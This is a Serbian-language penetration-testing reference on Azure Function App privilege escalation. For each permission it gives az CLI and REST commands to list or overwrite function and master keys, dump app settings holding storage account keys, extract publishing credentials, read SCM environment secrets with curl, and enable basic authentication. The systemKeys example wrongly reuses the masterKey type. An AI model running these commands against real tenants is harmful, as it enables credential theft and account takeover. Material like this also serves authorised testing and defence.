Az - Functions App Privesc

Function Apps

Proverite sledeću stranicu za više informacija:

Microsoft.Web/sites/host/listkeys/action

Ova dozvola omogućava listanje funkcija, master i sistemskih ključeva, ali ne i host ključa, specificirane funkcije sa:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

Ova dozvola omogućava dobijanje host ključa, od određene funkcije sa:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Ova dozvola omogućava kreiranje/izmenu funkcijskog ključa za određenu funkciju sa:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Ova dozvola omogućava kreiranje/aktuelizaciju glavnog ključa za određenu funkciju sa:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Ova dozvola omogućava kreiranje/izmenu sistemskog ključa funkcije za određenu funkciju sa:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Ova dozvola omogućava pristup promenljivim okruženja funkcije. Unutar ovih promenljivih može biti moguće pronaći podrazumevane env promenljive AzureWebJobsStorage ili WEBSITE_CONTENTAZUREFILECONNECTIONSTRING koje zapravo sadrže ključ naloga za pristup blob skladištu funkcije sa POTPUNIM dozvolama.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Ova dozvola omogućava da se prikažu svi profili objavljivanja koji u suštini sadrže osnovne autentifikacione kredencijale:

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Metod SCM

Zatim, možete pristupiti sa ovim osnovnim autentifikacionim podacima do SCM URL-a vaše funkcijske aplikacije i dobiti vrednosti env varijabli:

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Napomena da je SCM korisničko ime obično znak "$" praćen imenom aplikacije, tako da: $<app-name>.

I ove env promenljive sadrže AccountKey skladišnog naloga koji čuva podatke funkcijske aplikacije, omogućavajući kontrolu nad tim skladišnim nalogom.

Ako vidite da su te kredencijale REDAKTOVANE, to je zato što morate omogućiti SCM osnovnu opciju autentifikacije i za to vam je potrebna druga dozvola (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'